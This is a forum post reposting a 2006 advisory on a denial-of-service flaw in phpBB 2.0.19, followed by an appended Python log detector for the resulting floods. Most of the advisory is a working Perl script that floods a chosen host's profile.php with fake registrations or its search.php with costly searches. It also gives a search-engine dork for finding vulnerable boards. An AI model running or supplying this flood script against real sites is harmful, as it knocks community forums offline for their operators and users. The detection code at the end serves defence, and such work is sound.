phpBB 2.0.19 search.php and profile.php DOS Vulnerability

Posted: Mon Feb 27, 2006 5:35 am
wugluskr (Beginner) - Joined: Jun 08, 2005, Posts: 3

			| Found here: http://www.securityfocus.com/archive/1/423030/30/0/threaded 
 ------------------------------------------------------
 HYSA-2006-001 h4cky0u.org Advisory 010
 ------------------------------------------------------
 Date - Wed Jan 25 2006
 
 TITLE:
 ======
 
 phpBB 2.0.19 search.php and profile.php DOS Vulnerability
 
 SEVERITY:
 =========
 
 High
 
 SOFTWARE:
 =========
 
 phpBB 2.0.19 and prior
 
 INFO:
 =====
 
 phpBB is a high powered, fully scalable, and highly customizable
 Open Source bulletin board package. phpBB has a user-friendly
 interface, simple and straightforward administration panel, and
 helpful FAQ. Based on the powerful PHP server language and your
 choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
 phpBB is the ideal free community solution for all web sites.
 
 Support Website : http://www.phpbb.com
 
 BUG DESCRIPTION:
 ================
 
 The bug was originally found by HaCkZaTaN of NeoSecurityteam. The
 original exploit code can be found at -
 
 http://h4cky0u.org/viewtopic.php?t=637
 
 This one affected only versions up to phpBB 2.0.15. The exploit code
 has been recoded so that it affects the latest version too. The bug resides
 in the following two scripts -
 
 profile.php << By registering as many users as you can.
 search.php << By searching in a way that the db cannot understand.
 
 Proof Of Concept Code:
 ======================
 
 #!/usr/bin/perl
 #######################################
 ## Recoded by: mix2mix and Elioni of http://ahg-khf.org
 ## And h4cky0u Security Forums (http://h4cky0u.org)
 ## Name: phpBBDoSReloaded
 ## Original Author: HaCkZaTaN of Neo Security Team
 ## Tested on phpBB 2.0.19 and earlier versions
 ## Ported to perl by g30rg3_x
 ## Date: 25/01/06
 #######################################
 use strict;
 use warnings;
 use IO::Socket;
 
 ## Loop counter, also used to make every username / search unique
 my $x = 0;
 
 print q(
 phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
 Recoded by Albanian Hackers Group &
 h4cky0u Security Forums
 
 );
 print q(Host |without-> http://www.| );
 my $host = <STDIN>;
 chomp($host);
 
 print q(Path |example-> /phpBB2/ or /| );
 my $pth = <STDIN>;
 chomp($pth);
 
 print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
 my $type = <STDIN>;
 chomp($type);
 
 ## Open a fresh TCP connection to the target and send one POST request.
 ## $path is the script (appended to $pth), $accept the Accept header value
 ## and $body the urlencoded form body. Header lines end in CRLF and the
 ## body is sent exactly Content-Length bytes long.
 sub send_post {
     my ($path, $accept, $body) = @_;
     my $lrg = length $body;
 
     my $sock = IO::Socket::INET->new(
         PeerAddr => $host,
         PeerPort => 80,
         Proto    => 'tcp',
     ) or die "\nCannot connect to the host: it is either already DoSed or does not exist: $!\n";
 
     print $sock "POST $pth$path HTTP/1.1\r\n";
     print $sock "Host: $host\r\n";
     print $sock "Accept: $accept\r\n";
     print $sock "Referer: $host\r\n";
     print $sock "Accept-Language: en-us\r\n";
     print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
     print $sock "Accept-Encoding: gzip, deflate\r\n";
     print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n";
     print $sock "Connection: Keep-Alive\r\n";
     print $sock "Cache-Control: no-cache\r\n";
     print $sock "Content-Length: $lrg\r\n\r\n";
     print $sock $body;
     close($sock);
 
     ## Print a "+" for every request sent
     syswrite STDOUT, "+";
 }
 
 ## Type 1: registration flood through profile.php
 if ($type == 1) {
 
     ## User loop for 9999 iterations (enough for a flood)
     while ($x != 9999) {
 
         ## Username that gets registered, suffixed with "X"
         my $uname = "username=AHG__" . $x;
 
         ## E-mail address stored in the database, suffixed with "X"
         my $umail = "&email=AHG__" . $x;
 
         ## Full registration form as submitted by profile.php?mode=register
         my $postit = $uname . $umail
             . "%40ahg-crew.org&new_password=0123456&password_confirm=0123456"
             . "&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests="
             . "&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1"
             . "&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english"
             . "&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true"
             . "&coppa=0&submit=Submit";
 
         ## Send the registration request through the socket
         send_post("profile.php",
             "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
             $postit);
 
         $x++;
     }
 
 ## Type 2: search flood through search.php
 } elsif ($type == 2) {
 
     while ($x != 9999) {
 
         ## Final search string to send (unique per loop because of $x)
         my $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+"
             . "&search_terms=any&search_author=&search_forum=-1&search_time=0"
             . "&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC"
             . "&show_results=posts&return_chars=200";
 
         ## Send the DB-heavy search request through the socket
         send_post("search.php?mode=results",
             "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
             $postit);
 
         ## Increment X by one for every loop
         $x++;
     }
 
 } else {
     ## WTF??? What did you type
     die "Option not allowed +_-???\n";
 }
 
 FIX:
 ====
 
 No fix available as of date.
 
 GOOGLEDORK:
 ===========
 
 "Powered by phpBB"
 
 CREDITS:
 ========
 
 - This vulnerability was discovered and researched by HaCkZaTaN of
 NeoSecurityteam.
 
 - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest
 release of the script -
 
 Web : http://ahg-khf.org
 
 mail : webmaster at ahg-khf dot org
 
 - Co Researcher -
 
 h4cky0u of h4cky0u Security Forums.
 
 mail : h4cky0u at gmail dot com
 
 web : http://www.h4cky0u.org
 
 ORIGINAL ADVISORY:
 ==================
 
 http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt
 
 --
 http://www.h4cky0u.org
 (In)Security at its best...
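The two request patterns the PoC above produces (a burst of POSTs to profile.php from one address, and repeated POSTs to search.php?mode=results) are easy to pick out of a web server access log. The following detector is an added example, not code from the advisory, the h4cky0u authors or the phpBB project: it parses Apache "combined" log lines, keeps a per-IP sliding window of POSTs to those two scripts, and also flags the User-Agent string the PoC hard-codes. The threshold, window, host name and every log line are constructed assumptions for illustration, not real server data.

```python
# Added example (not from the advisory or phpBB): flag the profile.php /
# search.php POST floods generated by the PoC from Apache combined log lines.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent the PoC sends verbatim with every request
POC_UA = "Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"

# Scripts the PoC floods. mode=register travels in the POST body of the
# profile.php request, so only the path is visible in the access log;
# search.php carries mode=results in the query string.
TARGET_RE = re.compile(r"/(profile\.php|search\.php\?mode=results)$")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(lines, threshold=20, window_s=60):
    """Return sorted (ip, reason) alerts.

    An IP gets "post-flood" once it has sent more than `threshold` POSTs to
    profile.php or search.php?mode=results inside any `window_s`-second
    window, and "poc-user-agent" if any such POST carries the PoC's UA.
    Thresholds are assumed values; tune them to the board's real traffic.
    """
    alerts = set()
    recent = defaultdict(deque)  # ip -> timestamps of matching POSTs
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not TARGET_RE.search(rec["path"]):
            continue
        ip = rec["ip"]
        if rec["ua"] == POC_UA:
            alerts.add((ip, "poc-user-agent"))
        q = recent[ip]
        q.append(rec["ts"])
        # drop timestamps that fell out of the window (the newest one never does)
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) > threshold:
            alerts.add((ip, "post-flood"))
    return sorted(alerts)


def make_line(ip, ts, method, path, ua, status=200):
    """Build a constructed combined-format line (sample data, not a real log)."""
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S +0000")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 512 "forum.example" "{ua}"'


T0 = datetime(2006, 1, 25, 12, 0, 0, tzinfo=timezone.utc)
NORMAL_UA = "Mozilla/5.0 (X11; Linux i686; rv:1.8) Gecko/20051111 Firefox/1.5"

# Constructed sample: 25 PoC registrations in 25 seconds from 10.0.0.5,
# plus one ordinary search and one page view from 192.0.2.10.
SAMPLE_LOG = (
    [make_line("10.0.0.5", T0 + timedelta(seconds=i), "POST", "/phpBB2/profile.php", POC_UA)
     for i in range(25)]
    + [make_line("192.0.2.10", T0 + timedelta(seconds=5), "POST",
                 "/phpBB2/search.php?mode=results", NORMAL_UA)]
    + [make_line("192.0.2.10", T0 + timedelta(seconds=9), "GET", "/phpBB2/index.php", NORMAL_UA)]
)


def slow_sample():
    """Constructed control: 25 searches spaced 10 s apart, i.e. at most 7 per minute."""
    return [make_line("198.51.100.7", T0 + timedelta(seconds=10 * i), "POST",
                      "/phpBB2/search.php?mode=results", NORMAL_UA) for i in range(25)]


if __name__ == "__main__":
    for ip, reason in detect(SAMPLE_LOG):
        print(ip, reason)
```

The sliding window is what separates the flood from a busy but legitimate user: the same 25 searches spread over four minutes (slow_sample) raise nothing, while the PoC's back-to-back requests trip the threshold on the 21st post. Note that rotating the User-Agent is trivial for an attacker, so the "poc-user-agent" match is a convenience signature, not something to rely on alone.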

www.waraxe.us Forum Index -> PhpBB